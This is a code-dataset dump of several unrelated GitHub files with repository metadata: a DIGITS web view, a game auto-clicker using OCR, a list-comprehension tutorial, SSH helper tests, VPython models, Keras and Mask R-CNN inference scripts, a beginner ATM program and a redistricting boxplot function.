scheduler.delete_job(inference_job)\n\n if outputs is not None and len(outputs) < 1:\n # an error occurred\n outputs = None\n\n if inputs is not None:\n paths = [paths[idx] for idx in inputs['ids']]\n inference_views_html, header_html, app_begin_html, app_end_html = get_inference_visualizations(\n model_job.dataset,\n inputs,\n outputs)\n else:\n inference_views_html = None\n header_html = None\n app_begin_html = None\n app_end_html = None\n\n if request_wants_json():\n result = {}\n for i, path in enumerate(paths):\n result[path] = dict((name, blob[i].tolist()) for name, blob in outputs.iteritems())\n return flask.jsonify({'outputs': result}), status_code\n else:\n return flask.render_template(\n 'models/images/generic/infer_many.html',\n model_job=model_job,\n job=inference_job,\n paths=paths,\n inference_views_html=inference_views_html,\n header_html=header_html,\n app_begin_html=app_begin_html,\n app_end_html=app_end_html,\n ), status_code\n\n\ndef create_inference_db(model_job, data_extension_id):\n # create instance of extension class\n extension_class = extensions.data.get_extension(data_extension_id)\n if hasattr(model_job.dataset, 'extension_userdata'):\n extension_userdata = model_job.dataset.extension_userdata\n else:\n extension_userdata = {}\n extension_userdata.update({'is_inference_db': True})\n extension = extension_class(**extension_userdata)\n\n extension_form = extension.get_inference_form()\n extension_form_valid = extension_form.validate_on_submit()\n\n if not extension_form_valid:\n errors = extension_form.errors.copy()\n raise werkzeug.exceptions.BadRequest(repr(errors))\n\n extension.userdata.update(extension_form.data)\n\n # create job\n job = GenericDatasetJob(\n username=utils.auth.get_username(),\n name='Inference dataset',\n group=None,\n backend='lmdb',\n feature_encoding='none',\n label_encoding='none',\n batch_size=1,\n num_threads=1,\n force_same_shape=0,\n extension_id=data_extension_id,\n extension_userdata=extension.get_user_data(),\n )\n\n # schedule tasks and wait for job to complete\n scheduler.add_job(job)\n job.wait_completion()\n\n # check for errors\n if job.status != Status.DONE:\n msg = \"\"\n for task in job.tasks:\n if task.exception:\n msg = msg + task.exception\n if task.traceback:\n msg = msg + task.exception\n raise RuntimeError(msg)\n\n return job\n\n\ndef get_datasets(extension_id):\n if extension_id:\n jobs = [j for j in scheduler.jobs.values()\n if isinstance(j, GenericDatasetJob) and\n j.extension_id == extension_id and (j.status.is_running() or j.status == Status.DONE)]\n else:\n jobs = [j for j in scheduler.jobs.values()\n if (isinstance(j, GenericImageDatasetJob) or isinstance(j, GenericDatasetJob)) and\n (j.status.is_running() or j.status == Status.DONE)]\n return [(j.id(), j.name())\n for j in sorted(jobs, cmp=lambda x, y: cmp(y.id(), x.id()))]\n\n\ndef get_inference_visualizations(dataset, inputs, outputs):\n # get extension ID from form and retrieve extension class\n if 'view_extension_id' in flask.request.form:\n view_extension_id = flask.request.form['view_extension_id']\n extension_class = extensions.view.get_extension(view_extension_id)\n if extension_class is None:\n raise ValueError(\"Unknown extension '%s'\" % view_extension_id)\n else:\n # no view extension specified, use default\n extension_class = extensions.view.get_default_extension()\n extension_form = extension_class.get_config_form()\n\n # validate form\n extension_form_valid = extension_form.validate_on_submit()\n if not extension_form_valid:\n raise ValueError(\"Extension form validation failed with %s\" % repr(extension_form.errors))\n\n # create instance of extension class\n extension = extension_class(dataset, **extension_form.data)\n\n visualizations = []\n # process data\n n = len(inputs['ids'])\n for idx in xrange(n):\n input_id = inputs['ids'][idx]\n input_data = inputs['data'][idx]\n output_data = {key: outputs[key][idx] for key in outputs}\n data = extension.process_data(\n input_id,\n input_data,\n output_data)\n template, context = extension.get_view_template(data)\n visualizations.append(\n flask.render_template_string(template, **context))\n # get header\n template, context = extension.get_header_template()\n header = flask.render_template_string(template, **context) if template else None\n app_begin, app_end = extension.get_ng_templates()\n return visualizations, header, app_begin, app_end\n\n\ndef get_previous_networks():\n return [(j.id(), j.name()) for j in sorted(\n [j for j in scheduler.jobs.values() if isinstance(j, GenericImageModelJob)],\n cmp=lambda x, y: cmp(y.id(), x.id())\n )\n ]\n\n\ndef get_previous_networks_fulldetails():\n return [(j) for j in sorted(\n [j for j in scheduler.jobs.values() if isinstance(j, GenericImageModelJob)],\n cmp=lambda x, y: cmp(y.id(), x.id())\n )\n ]\n\n\ndef get_previous_network_snapshots():\n prev_network_snapshots = []\n for job_id, _ in get_previous_networks():\n job = scheduler.get_job(job_id)\n e = [(0, 'None')] + [(epoch, 'Epoch #%s' % epoch)\n for _, epoch in reversed(job.train_task().snapshots)]\n if job.train_task().pretrained_model:\n e.insert(0, (-1, 'Previous pretrained model'))\n prev_network_snapshots.append(e)\n return prev_network_snapshots\n\n\ndef get_pretrained_networks():\n return [(j.id(), j.name()) for j in sorted(\n [j for j in scheduler.jobs.values() if isinstance(j, PretrainedModelJob)],\n cmp=lambda x, y: cmp(y.id(), x.id())\n )\n ]\n\n\ndef get_pretrained_networks_fulldetails():\n return [(j) for j in sorted(\n [j for j in scheduler.jobs.values() if isinstance(j, PretrainedModelJob)],\n cmp=lambda x, y: cmp(y.id(), x.id())\n )\n ]\n\n\ndef get_data_extensions():\n \"\"\"\n return all enabled data extensions\n \"\"\"\n data_extensions = {\"all-default\": \"Default\"}\n all_extensions = extensions.data.get_extensions()\n for extension in all_extensions:\n data_extensions[extension.get_id()] = extension.get_title()\n return data_extensions\n\n\ndef get_view_extensions():\n \"\"\"\n return all enabled view extensions\n \"\"\"\n view_extensions = {}\n all_extensions = extensions.view.get_extensions()\n for extension in all_extensions:\n view_extensions[extension.get_id()] = extension.get_title()\n return view_extensions\n","repo_name":"NVIDIA/DIGITS","sub_path":"digits/model/images/generic/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":31978,"program_lang":"python","lang":"en","doc_type":"code","stars":4106,"dataset":"github-code","pt":"48"} +{"seq_id":"14980963630","text":"import random\nimport autopy\nimport pyautogui\nimport time\nimport json\nfrom threading import Timer\nimport cv2\nimport pytesseract\n\ndef click_readyup_button():\n print('CHECKING...')\n if should_click():\n try:\n autopy.mouse.move(*(230, 928))\n time.sleep(.2)\n autopy.mouse.click()\n except TypeError:\n print('INTERNAL ERROR OCCURED. CONTACT DEVELOPER.')\n\ndef get_position():\n print(\n pyautogui.position()\n )\n\ndef should_click():\n box = ((140, 950), (170, 42))\n screenshot = autopy.bitmap.capture_screen(box)\n screenshot.save('screenshot.png')\n img = cv2.imread('screenshot.png')\n threshold = 90\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n thresh = cv2.threshold(gray, threshold, 255, cv2.THRESH_BINARY_INV)[1]\n # cv2.imshow('thresh', thresh)\n # cv2.waitKey(0)\n scanned_text = pytesseract.image_to_string(img, lang='eng', config='--psm 6')\n try:\n print(scanned_text)\n if 'READY' in scanned_text:\n print('read READY in screenshot')\n return True\n elif 'CANCEL' in scanned_text:\n print('read CANCEL in screenshot')\n return True\n else:\n print('read nothing in screenshot')\n return False\n except AttributeError:\n raise Exception(f'OCR MODULE: COULD NOT RETRIEVE TEXT')\n\nif __name__ == '__main__':\n print(\n should_click()\n )","repo_name":"Zenahr/ALUB","sub_path":"lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6427629729","text":"numbers = [1,2,3,4,5,6,7,8,9,10]\r\n\r\n# 1.a for loop example - I want 'n' for each 'n' in numbers\r\n\r\nmy_list = []\r\nfor n in numbers:\r\n my_list.append(n)\r\nprint(my_list)\r\n\r\n# 1.b Comprehension - I want 'n' for each 'n' in numbers\r\n\r\nmy_list = [n for n in numbers]\r\nprint(my_list)\r\n\r\n# 2.a for loop example - I want 'n*n' for each 'n' in numbers\r\nmy_list = []\r\nfor n in numbers:\r\n my_list.append(n*n)\r\nprint(my_list)\r\n\r\n# 2.b Comprehension - I want 'n*n' for each 'n' in numbers\r\n\r\nmy_list = [n*n for n in numbers]\r\nprint(my_list)\r\n\r\n# 3.a for loop example - I want 'n' for each 'n' in numbers if n is even\r\nmy_list = []\r\nfor n in numbers:\r\n if n%2 == 0:\r\n my_list.append(n)\r\nprint(my_list)\r\n\r\n# 3.b Comprehension - I want 'n*n' for each 'n' in numbers\r\n\r\nmy_list = [n for n in numbers if n%2 == 0]\r\nprint(my_list)\r\n\r\n\r\n# 4.a for loop example - I want (letter,num) for each letter in abcde and each num in 12345 \r\nmy_list = []\r\nfor letter in 'abcde':\r\n for num in range(5):\r\n my_list.append((letter,num))\r\nprint(my_list)\r\n\r\n# 4.b Comprehension - I want (letter,num) for each letter in abcde and each num in 12345 \r\nmy_list = [(letter,num) for letter in 'abcde' for num in range(5)]\r\nprint(my_list)\r\n\r\n\r\n# 5.a for loop example - Dictionary comprehension\r\nfnames = ['Sachin','Sourav','Rahul','Mahendra','Virat']\r\nsnames = ['Tendulkar','Ganguly','Dravid','Dhoni','Kohli']\r\n\r\n# Dictionary of dict = {'fname':'sname'} for each fname and sname in zip(fname,sname)\r\nmy_dict = {}\r\nfor fname,sname in zip(fnames,snames):\r\n my_dict[fname] = sname\r\nprint(my_dict)\r\n\r\n# 5.b Dictionary comprehension - Remove Viart from the list\r\nmy_dict = {fname:sname for fname,sname in zip(fnames,snames) if fname != 'Virat'}\r\nprint(my_dict)\r\n\r\n# 6.a Set Comprehensions - for loop generate squared value of a set\r\nnumbers = [1,2,3,4,5,6,7,8,6,3,2,4,5,8,1,2,8,9,2,3,5,6,5,9,10]\r\nmy_set = set()\r\nfor n in numbers:\r\n my_set.add(n*n)\r\nprint(my_set)\r\n\r\n# 6.b Set Comprehensions - generate squared value of a set\r\nmy_set = {n*n for n in numbers}\r\nprint(my_set)\r\n","repo_name":"manjubsavanth/PythonProgramming","sub_path":"ListComprehension.py","file_name":"ListComprehension.py","file_ext":"py","file_size_in_byte":2057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10911717244","text":"import pytest\n\nfrom infrared.core.utils import interactive_ssh as issh\nfrom infrared.core.utils import exceptions\nfrom infrared.core.services import workspaces\n\n\n@pytest.fixture(scope=\"session\")\ndef workspace_manager_fixture(tmpdir_factory):\n \"\"\"Sets the default workspace direcotry to the temporary one. \"\"\"\n\n temp_workspace_dir = tmpdir_factory.mktemp('pmtest')\n workspace_manager = workspaces.WorkspaceManager(str(temp_workspace_dir))\n from infrared.core.services import CoreServices\n CoreServices.register_service(\"workspace_manager\", workspace_manager)\n yield workspace_manager\n\n\n@pytest.fixture()\ndef test_workspace(workspace_manager_fixture):\n \"\"\"Creates test workspace in the temp directory. \"\"\"\n\n name = 'test_workspace'\n test_workspace = workspace_manager_fixture.create(name)\n workspace_manager_fixture.activate(test_workspace.name)\n test_workspace.inventory = \"tests/example/test_ssh_inventory\"\n yield test_workspace\n if workspace_manager_fixture.has_workspace(name):\n workspace_manager_fixture.delete(name)\n\n\ndef test_parse_inventory(workspace_manager_fixture, test_workspace, mocker):\n import os\n mocker.patch(\"os.system\")\n\n ssh_cmd_str = \" \".join([\n \"ssh -i /dev/null\",\n \" -o ForwardAgent=yes\",\n \"-o ServerAliveInterval=30\",\n \"-o ControlMaster=auto\",\n \"-o ControlPersist=30m\",\n \"-o StrictHostKeyChecking=no\",\n \"-o UserKnownHostsFile=/dev/null\",\n \"-o ProxyCommand=\\\"ssh\",\n \"-o StrictHostKeyChecking=no\",\n \"-o UserKnownHostsFile=/dev/null\",\n \"-W %h:%p -i /dev/null ttest@tthost\\\"\",\n \" -p 33 -t test-user@0.0.0.0\"\n ])\n\n issh.ssh_to_host(\"test_host\")\n\n # make sure we aren't calling ssh more than once\n os.system.assert_called_once_with(ssh_cmd_str)\n\n ssh_cmd_str = \" \".join([\n \"ssh -i /dev/null\",\n \" -o ForwardAgent=yes\",\n \"-o ServerAliveInterval=30\",\n \"-o ControlMaster=auto\",\n \"-o ControlPersist=30m\",\n \"-o StrictHostKeyChecking=no\",\n \"-o UserKnownHostsFile=/dev/null\",\n \"-o ProxyCommand=\\\"ssh\",\n \"-o StrictHostKeyChecking=no\",\n \"-o UserKnownHostsFile=/dev/null\",\n \"-W %h:%p -i /dev/null ttest@tthost\\\"\",\n \" -p 33 -t test-user@0.0.0.0 \\\"some cmd line\\\"\"\n ])\n\n issh.ssh_to_host(\"test_host\", \"some cmd line\")\n\n os.system.assert_called_with(ssh_cmd_str)\n\n\ndef test_wrong_host_exception(workspace_manager_fixture, test_workspace):\n\n with pytest.raises(exceptions.IRSshException):\n issh.ssh_to_host(\"wrong_host\")\n\n\ndef test_wrong_connection_type_exception(workspace_manager_fixture,\n test_workspace):\n\n with pytest.raises(exceptions.IRSshException):\n issh.ssh_to_host(\"localhost\")\n","repo_name":"redhat-openstack/infrared","sub_path":"tests/test_interactive_ssh.py","file_name":"test_interactive_ssh.py","file_ext":"py","file_size_in_byte":2797,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"48"} +{"seq_id":"38024251454","text":"# Q11-Projekt Risiko\n# Extrusionsobjekte am Beispiel eines Spielsteins\nfrom visual import *\n\nclass Vierzack(extrusion):\n \"modelliert Spielstein mit 4 Ecken\"\n def __init__(self, pos=(0,0,0), höhe=3, color=color.red):\n \n # 1. 2D-Figuren erstellen\n viereck = Polygon([(1,1),(1,-1),(-1,-1),(-1,1)])\n kreis1 = shapes.circle(pos=( 1, 1), radius=0.9)\n kreis2 = shapes.circle(pos=( 1,-1), radius=0.9)\n kreis3 = shapes.circle(pos=(-1,-1), radius=0.9)\n kreis4 = shapes.circle(pos=(-1, 1), radius=0.9)\n\n # 2. Pfad erzeugen (hier entlang y-Achse)\n # Tupel lassen sich elementweise addieren, Vektoren schon!\n pfad = [vector(pos),vector(pos) + vector(0,höhe,0)]\n\n # 3. Extrusionsobjekt erzeugen\n extrusion.__init__(self, pos=pfad, color=color,\n shape=viereck-kreis1-kreis2-kreis3-kreis4,\n angle2=pi, material=materials.plastic)\n\nclass Kanone(extrusion):\n \"modelliert Kanonenrohr bzw. Spielstein\"\n def __init__(self, pos=(0,1,0), länge=3, material=materials.silver):\n\n # 1. 2D-Figur erstellen\n kreisaussen = shapes.circle(pos=(0,0), radius = 0.5)\n kreisinnen = shapes.circle(pos=(0,0), radius = 0.3)\n\n # 2. Pfad erzeugen\n pfad = [vector(pos), vector(pos) + vector(länge,0,0)]\n\n # 3. Object erzeugen\n extrusion.__init__(self, pos=pfad, material=material,\n shape=kreisaussen-kreisinnen, angle2=pi)\n\n # 4. Kugel hinten drauf\n\n ende = sphere(pos=pos, radius=.5, material=material)\n bobbel = sphere(pos=(-.4,1,0),radius=.25, material=material)\n\n # 5. Räder\n\n rad1 = ring(pos=(.5,.7,.6),material=materials.wood,axis=(0,0,1),\n radius=.7, thickness=.2)\n rad2 = ring(pos=(.5,.7,-.6),material=materials.wood,axis=(0,0,1),\n radius=.7, thickness=.2)\n speiche1 = cylinder(pos=(-.25,.7,.6),material=materials.wood,axis=(1.5,0,0),\n radius=.15)\n speiche2 = cylinder(pos=(.5,0,.6),material=materials.wood,axis=(0,1.5,0),\n radius=.15)\n speiche3 = cylinder(pos=(-.25,.7,-.6),material=materials.wood,axis=(1.5,0,0),\n radius=.15)\n speiche4 = cylinder(pos=(.5,0,-.6),material=materials.wood,axis=(0,1.5,0),\n radius=.15)\n\n\nif __name__ == \"__main__\":\n \"Testanweisungen, falls standalone-Aufruf\"\n \"\"\"v1 = Vierzack()\n v2 = Vierzack(pos=(5,0,-3), color=color.green)\n v3 = Vierzack(pos=(-5,0,5), color=color.yellow)\n v4 = Vierzack(pos=(4,0,-7), color=(0.8,0.5,0.2)) #braun\n v5 = Vierzack(pos=(-6,0,-6), color=color.magenta)\n v6 = Vierzack(pos=(-2,0,4), color=color.blue)\"\"\"\n k1 = Kanone()\n\n while True:\n rate(25)\n pass\n \n","repo_name":"huegit/q11","sub_path":"beispielskript_kanone_aEpple.py","file_name":"beispielskript_kanone_aEpple.py","file_ext":"py","file_size_in_byte":2875,"program_lang":"python","lang":"de","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"3491435549","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport keras\r\nimport cv2\r\nfrom keras.layers import Input\r\nfrom keras.models import Model\r\nimport random\r\nfrom tensorflow.keras.layers import Dense, Conv2D, Flatten, MaxPooling2D\r\nimport tensorflow as tf\r\nimport os.path\r\nimport pandas as pd\r\nfrom tensorflow.keras.applications.densenet import DenseNet121\r\n\r\nTESTING_IMAGES_FOLDER = \"testing/\"\r\nWEIGHTS_FOLDER = \"weights/\"\r\n\r\n# class_names = \"Atelectasis,Cardiomegaly,Effusion,Infiltration,Mass,Nodule,Pneumonia,Pneumothorax,Consolidation,Edema,Emphysema,Fibrosis,Pleural_Thickening,Hernia\"\r\nclass_names = \"Atelectasis,Cardiomegaly,Consolidation,Edema,Pleural_Effusion\"\r\nn_classes = 5\r\n\r\nIMG_HEIGHT = 224\r\nIMG_WIDTH = 224\r\nIMG_CHANNELS = 3\r\n\r\ninput_shape = (IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS)\r\nimg_input = Input(shape=input_shape)\r\n\r\n\r\nprint(\"** load model **\")\r\nbase_model = DenseNet121(input_shape=input_shape, include_top=False, weights='imagenet', input_tensor=img_input, pooling=\"avg\") # for RGB\r\nx = base_model.output\r\npredictions = Dense(n_classes, activation=\"sigmoid\", name=\"predictions\")(x)\r\nmodel = Model(inputs=img_input, outputs=predictions)\r\n# model.summary()\r\n\r\n\r\nprint(\"** load weights **\")\r\nmodel.load_weights(os.path.join(WEIGHTS_FOLDER, \"best_weights_15559827687076797.h5\"))\r\nprint(model.get_weights()[0])\r\n\r\n\r\n# Data Read\r\nfor test_img_name in os.listdir(TESTING_IMAGES_FOLDER):\r\n img = cv2.imread(os.path.join(TESTING_IMAGES_FOLDER, test_img_name))\r\n img = cv2.resize(img, (IMG_WIDTH, IMG_HEIGHT))\r\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n img = img / 255.\r\n # img = np.mean(img, axis=2) convert to 1-dim gray\r\n # print(img)\r\n\r\n Xtest = img\r\n Xtest = Xtest.reshape(-1, IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS)\r\n\r\n # demonstrate prediction\r\n print(\"file: \", test_img_name)\r\n print(class_names)\r\n yhat = model.predict(Xtest, verbose=1)\r\n print(np.round(yhat, 4))\r\n max_pos = np.argmax(yhat, axis=1)\r\n class_list = class_names.split(\",\")\r\n print(max_pos)\r\n print(class_list[max_pos[0]])\r\n print(\"\\n\")\r\n","repo_name":"bachtses/Classification-MultiLabel-Cancer-Images-Template-Tags","sub_path":"5_multi_label_classification_predict.py","file_name":"5_multi_label_classification_predict.py","file_ext":"py","file_size_in_byte":2079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29989902020","text":"import requests\nimport sys\nimport os\n\nsys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))\n\nimport Account\nimport Card\n\nRoot = \"api.bearRobotics.com/ATM\" # API Root url\n\n# Alert\ndef Alert(text):\n print(\"====================================\")\n print(\"===============Alert================\")\n print(\"====================================\")\n print(\"=>\", text)\n\n# check card valid => return Verification PIN_Number\ndef CheckCard(cardNumber, PIN):\n datas = { 'cardNumber' : cardNumber, 'PIN' : PIN }\n url = Root + \"/CheckCard\"\n headers = {'Content-Type' : 'application/json; charset=utf-8'}\n \n response = requests.post(url, data=datas, headers=headers)\n return response.status_code\n\ndef EjectCard():\n # card eject\n return True\n\ndef EjectMoney():\n # card eject\n return True\n\ndef GetAccount(cardNumber, PIN):\n # get balance\n datas = { 'cardNumber' : cardNumber, 'PIN' : PIN }\n url = Root + \"/GetBalnaceAccount\"\n headers = {'Content-Type' : 'application/json; charset=utf-8'}\n \n response = requests.post(url, data=datas, headers=headers)\n return response\n\ndef Balance(_Account):\n Alert(\"your balance is \", _Account.Balance)\n return _Account.Balance\n \ndef Deposit(_Account, IN):\n\n Balance = _Account.Balance + IN\n \n # save balance\n datas = { 'Balance' : Balance }\n url = Root + \"/Deposit\"\n headers = {'Content-Type' : 'application/json; charset=utf-8'}\n \n response = requests.post(url, data=datas, headers=headers)\n return response\n\ndef Withdrawal(Balance, Out):\n Balance = Balance + Out\n \n # save balance\n datas = { 'Balance' : Balance }\n url = Root + \"/Withdrawal\"\n headers = {'Content-Type' : 'application/json; charset=utf-8'}\n \n response = requests.post(url, data=datas, headers=headers)\n return response\n\ndef main(_Account, _Card):\n\n while True:\n\n Alert(\"Please Enter your Card. If you want to exit the program, Press 0\")\n CardNumber, PIN = input() # contains PIN Number\n\n # if user press 0 => exit\n if CardNumber == 0:\n exit()\n\n _Card.set([CardNumber, PIN]) # set\n\n result = await CheckCard(_Card.Number, _Card.PIN) # check card validation\n\n\n if result == \"Sucess\":\n Alert(\"Press 1 to balance check or 2 to deposit money or 3 to withdrawal money\")\n order = input() # Balance // Deposit // Withdrawal\n\n # class\n balance_information = await GetAccount(_Card.Number, _Card.PIN)\n _Account.set(balance_information)\n\n if order == 1:\n Balance(_Account)\n\n if order == 2:\n Alert(\"Choose the amount to deposit\")\n IN = input()\n\n Alert(\"Please Enter money\")\n Money = input()\n\n if IN != Money:\n Alert(\"The deposit amount is different. Please try again\")\n EjectMoney() # Money Eject\n EjectCard() # Card Eject\n\n if IN == Money:\n Deposit_result = Deposit(_Account, IN, Money)\n\n if Deposit_result.status_code == \"Fail\":\n Alert(\"Error : The deposit operation did not proceed. Please try again\")\n\n if Deposit_result.status_code == \"Sucess\":\n Alert(IN + \"$ has been deposited into your account. The remaining balance is\" + Deposit_result.Balance)\n\n if order == 3:\n Alert(\"Choose the amount to withdrawal\")\n Out = input()\n\n if Out > _Account.Balance:\n Alert(\"The withdrawal amount is greater than your balance. Please try again\")\n EjectMoney() # Money Eject\n EjectCard() # Card Eject\n\n else:\n Withdrawal_result = Withdrawal(_Account, Out)\n\n if Withdrawal_result.status_code == \"Fail\":\n Alert(\"Error : The withdrawal operation did not proceed. Please try again\")\n\n if Withdrawal_result.status_code == \"Sucess\":\n Alert(Out + \"$ has been withdrawn from your account. The remaining balance is\" + Withdrawal_result.Balance)\n\n else:\n Alert(\"Error : Card is invalid\") # Alert\n\nif __name__ == \"__main__\":\n\n\n _Account = Account() # account information\n _Card = Card() # Card information\n\n main(_Account, _Card)\n\n os.execl(sys.executable, sys.executable, *sys.argv) # loop","repo_name":"givinkwon/test","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71725252946","text":"\"\"\"\nGiven a string s, partition s such that every substring of the partition is a palindrome.\n\nReturn all possible palindrome partitioning of s.\n\nExample:\n\nInput: \"aab\"\nOutput:\n[\n [\"aa\",\"b\"],\n [\"a\",\"a\",\"b\"]\n]\n\"\"\"\nclass Solution(object):\n def partition(self, s):\n \"\"\"\n :type s: str\n :rtype: List[List[str]]\n \"\"\"\n if not s:\n return []\n self.res = []\n self.dfs(s, [])\n return self.res\n\n # 这里的string仅表示还没经历过分层的string\n def dfs(self, string, temp):\n if not string:\n self.res.append(temp[:])\n return\n\n for i in range(1, len(string)+1):\n # i从1开始主要是这里的原因,因为我们要使用切片,[:i],i最少为1,切一次\n if self.check(string[:i]):\n # 我们发现string[:i]是回文的,所以把它添加进temp里,同时,把i及以后的字符串放进dfs里继续切割\n self.dfs(string[i:], temp + [string[:i]])\n\n def check(self, string):\n return string == string[::-1]\n\n\"\"\"\nhttps://www.youtube.com/watch?v=UFdSC_ml4TQ\n\"\"\"","repo_name":"Andrewlearning/Leetcoding","sub_path":"leetcode/String/Palindrome(回文)/131. 分割回文串(回溯).py","file_name":"131. 分割回文串(回溯).py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10322209121","text":"import random\n\nfrom matplotlib.axes import Axes\n\nfrom .colors import citizenBlue, defaultGray, districtr\n\n\ndef boxplot(\n ax,\n scores,\n xticklabels=None,\n labels=None,\n proposed_info={},\n percentiles=(1, 99),\n rotation=0,\n ticksize=12,\n jitter=1 / 3,\n) -> Axes:\n r\"\"\"\n Plot boxplots, which takes `scores` — a dictionary where each value\n (corresponding to an ensemble, citizens' ensemble, or proposed plans),\n will be a list of lists, where each sublist will be its own box. Proposed\n scores will be plotted as colored circles on their respective box. Color the\n boxplots conditioned on the kind of the scores (ensemble or citizen), and\n trim each sublist to only the values between the specified percentiles.\n\n Args:\n ax (Axes): `Axes` object on which the boxplots are plotted.\n scores (dict): Dictionary with keys of `ensemble`, `citizen`, `proposed`\n which map to lists of numerical scores.\n proposed_info (dict, optional): Dictionary with keys of `colors`, `names`;\n the \\(i\\)th color in `color` corresponds to the \\(i\\)th name in `names`.\n percentiles (tuple, optional): Observations outside this range of\n percentiles are ignored. Defaults to `(1, 99)`, such that observations\n between the 1st and 99th percentiles (inclusive) are included, and\n all others are ignored.\n rotation (float, optional): Tick labels are rotated `rotation` degrees\n _counterclockwise_.\n ticksize (float, optional): Font size for tick labels.\n jitter (float, optional): When there is more than one proposed plan,\n adjust its detail points by a value drawn from \\(\\mathcal U (-\\epsilon,\n \\epsilon)\\) where \\(\\epsilon = \\) `jitter`.\n labels (list, optional): x- and y-axis labels, if desired.\n xticklabels (list, optional): Labels for the boxes, default to integers.\n\n Returns:\n `Axes` object on which the violins are plotted.\n \"\"\"\n # Get all the scores into one list; pick a face color.\n ensemble = scores[\"ensemble\"] if \"ensemble\" in scores else scores[\"citizen\"]\n facecolor = defaultGray if \"ensemble\" in scores else citizenBlue\n\n # Specify the boxplots' style.\n boxstyle = {\n \"lw\": 1 / 2,\n \"color\": facecolor,\n }\n\n # Plot boxplots.\n ax.boxplot(\n ensemble,\n whis=percentiles,\n boxprops=boxstyle,\n whiskerprops=boxstyle,\n capprops=boxstyle,\n medianprops=boxstyle,\n showfliers=False,\n )\n\n # Set xticks, xlabels, and x-axis limits\n if not xticklabels:\n xticklabels = range(1, len(scores[\"ensemble\"]) + 1)\n ax.set_xticks(range(1, len(ensemble) + 1))\n ax.set_xticklabels(xticklabels, fontsize=ticksize, rotation=rotation)\n ax.set_xlim(0.5, len(ensemble) + 0.5)\n\n # Plot each proposed plan individually, adjusting its detail points by\n # a value drawn from the uniform distribution of specified width centered on\n # the index of the violin.\n if \"proposed\" in scores:\n for boxplot in range(len(scores[\"proposed\"])):\n for plan, score in enumerate(scores[\"proposed\"][boxplot]):\n # Horizontally jitter proposed scores if there are multiple scores\n # at the same height.\n jitter_val = (\n random.uniform(-jitter, jitter)\n if scores[\"proposed\"][boxplot].count(score) > 1\n else 0\n )\n color_val = \"\"\n if \"colors\" in scores[\"proposed\"]:\n color_val = scores[\"proposed\"][\"colors\"][boxplot]\n else:\n color_val = districtr(plan + 1).pop()\n ax.scatter(\n boxplot + 1 + jitter_val,\n score,\n color=color_val,\n edgecolor=\"black\",\n s=100,\n alpha=0.9,\n label=proposed_info[\"names\"][plan] if boxplot == 0 else None,\n )\n ax.legend()\n\n if labels:\n ax.set_xlabel(labels[0], fontsize=24)\n ax.set_ylabel(labels[1], fontsize=24)\n\n return ax\n","repo_name":"mggg/gerrytools","sub_path":"gerrytools/plotting/boxplot.py","file_name":"boxplot.py","file_ext":"py","file_size_in_byte":4237,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"43632861100","text":"from mrcnn.config import Config\r\nfrom mrcnn import model as modellib\r\nfrom mrcnn.utils import Dataset\r\nfrom mrcnn import visualize\r\nfrom os import listdir\r\n\r\n\r\nclass MyMaskRCNNConfig(Config):\r\n NAME = \"MaskRCNN_config\"\r\n\r\n GPU_COUNT = 1\r\n IMAGES_PER_GPU = 1\r\n\r\n # number of classes + BG\r\n NUM_CLASSES = 2 + 1\r\n\r\n DETECTION_MIN_CONFIDENCE = 0.9\r\n\r\n MAX_GT_INSTANCES = 10\r\n\r\n\r\nclass BlurAndScratchDataset(Dataset):\r\n def load_dataset(self, dataset_dir, is_train=True):\r\n\r\n self.add_class(\"dataset\", 1, \"blur\")\r\n self.add_class(\"dataset\", 2, \"scratch\")\r\n\r\n images_dir = dataset_dir + '/images/'\r\n annotations_dir = dataset_dir + '/annots/'\r\n\r\n for filename in listdir(images_dir):\r\n\r\n image_id = filename[:-4]\r\n # after 120 if we are building the train set\r\n new_image_id = 0\r\n if image_id[0:4] == 'blur':\r\n new_image_id = image_id[4:]\r\n elif image_id[0:7] == 'scratch':\r\n new_image_id = image_id[7:]\r\n\r\n if is_train and int(new_image_id) >= 120:\r\n continue\r\n # before 120 if we are building the test/val set\r\n if not is_train and int(new_image_id) < 120:\r\n continue\r\n\r\n img_path = images_dir + filename\r\n\r\n ann_path = annotations_dir + image_id + '.xml'\r\n\r\n self.add_image('dataset', image_id=image_id, path=img_path, annotation=ann_path)\r\n\r\n def image_reference(self, image_id):\r\n info = self.image_info[image_id]\r\n return info['path']\r\n\r\n\r\ntest_set = BlurAndScratchDataset()\r\ntest_set.load_dataset('blur_and_scratch_dataset', is_train=False)\r\ntest_set.prepare()\r\n\r\nmodel_path = 'mask_rcnn_.1576924943.852383.h5'\r\nconfig = MyMaskRCNNConfig()\r\nmodel = modellib.MaskRCNN(mode=\"inference\", config=config, model_dir='./')\r\nmodel.load_weights(model_path, by_name=True)\r\nimage_id = 4\r\nimage, image_meta, gt_class_id, gt_bbox, gt_mask = modellib.load_image_gt(test_set, config, image_id,\r\n use_mini_mask=False)\r\ninfo = test_set.image_info[image_id]\r\nprint(\"image ID: {}.{} ({}) {}\".format(info[\"source\"], info[\"id\"], image_id,\r\n test_set.image_reference(image_id)))\r\nresults = model.detect([image], verbose=1)\r\nr = results[0]\r\nvisualize.display_instances(image, r['rois'], r['masks'], 